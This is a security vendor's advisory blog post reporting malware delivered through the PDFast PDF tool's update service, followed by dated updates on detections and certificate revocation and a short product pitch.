Update: 4/21, 12:06 PM MT: Certificates used for signing malicious versions of PDFast have now been revoked. However, threat actors will keep finding new ways to compromise victims. Todyl will continue monitoring and update detections as needed.
Update: 4/17, 10:48 AM MT: Windows Defender is now blocking PDFast as well, but it appears the attackers are currently manipulating the code to avoid detection. Todyl MXDR and Detections Engineering are actively working to block changes in the code as they arise.
The Todyl MXDR team has detected malware being distributed from within a free PDF tool called PDFast (pdf-fast[.]com). All affected Todyl partners were immediately alerted upon discovery and non-MXDR partners have been notified over email. In addition, the MXDR team pushed out a global block to all EDR customers within 30 minutes of detection. The MXDR team has also pushed a global update to Todyl SASE to block any communication with the malicious sites.
These updates immediately stop further compromise by preventing any communication and/or downloads from the malicious sites.
Stay tuned to this blog post as we will post more updates as we uncover more information.
MXDR team uncovered widespread malicious encoded PowerShell originating from “upd.exe”, an update service executable related to the PDFast software. The malicious executable, “upd.exe,” spawns from services.exe which in turn is spawned from svchost.exe, both legitimate Windows processes.
Using Todyl SIEM, the MXDR team found this malicious executable and subsequent encoded PowerShell were triggered via a PDFast service. This indicates that either the malicious code was introduced within PDFast’s development supply chain or was intentionally included within the software itself.
The encoded PowerShell script, when executed, downloads malware from two malicious URLs hosted in China. Todyl’s MXDR team is currently reverse engineering the payload to determine the full scope of the threat.
The malicious PowerShell was detected via Todyl’s EDR and SIEM simultaneously. Todyl’s EDR in Prevent mode automatically blocks the PowerShell script from running
Uninstall all instances of PDFast as soon as possible to prevent further compromise.
MXDR partners, please reach out to your DRAM if you are concerned that you’ve been affected. You may also submit any similar sites of concern to the MXDR team, and we will review them as soon as possible.
If you’re not currently using Todyl EDR or SASE, you can add each product module for immediate protection against this PDFast and other prominent threats. Contact us to learn more.
